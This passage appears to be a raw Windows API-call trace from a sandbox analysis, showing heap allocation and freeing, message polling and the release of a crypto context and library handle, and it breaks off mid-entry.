[0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0243.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0243.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0243.592] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0243.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0243.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0243.592] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0243.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0243.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0243.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.592] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0243.592] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0243.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0243.592] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0243.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0243.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.592] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0243.593] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0243.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.593] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0243.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0243.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0243.593] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0243.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0243.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.593] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.593] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0243.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0243.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.594] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0243.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0243.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.594] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0243.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.594] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0243.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.594] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0243.594] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0243.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0243.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0243.595] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0243.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0243.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0243.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.595] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0243.595] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.595] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0243.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0243.596] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0243.596] FreeLibrary (hLibModule=0x756e0000) returned 1 [0243.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0243.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0243.596] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0243.596] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0243.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0243.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0243.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0243.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0243.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0243.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0243.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0243.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0243.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0243.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0243.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0243.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0243.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0243.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.597] CloseHandle (hObject=0x2a0) returned 1 [0243.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0243.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0243.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0243.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0243.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0243.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f98 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0243.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0243.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.602] CloseHandle (hObject=0x2d0) returned 1 [0243.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0243.604] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0243.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0243.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0243.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0243.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0243.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0243.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0243.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0243.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0243.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0243.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0243.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0243.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0243.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0243.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0243.610] HeapFree (in: 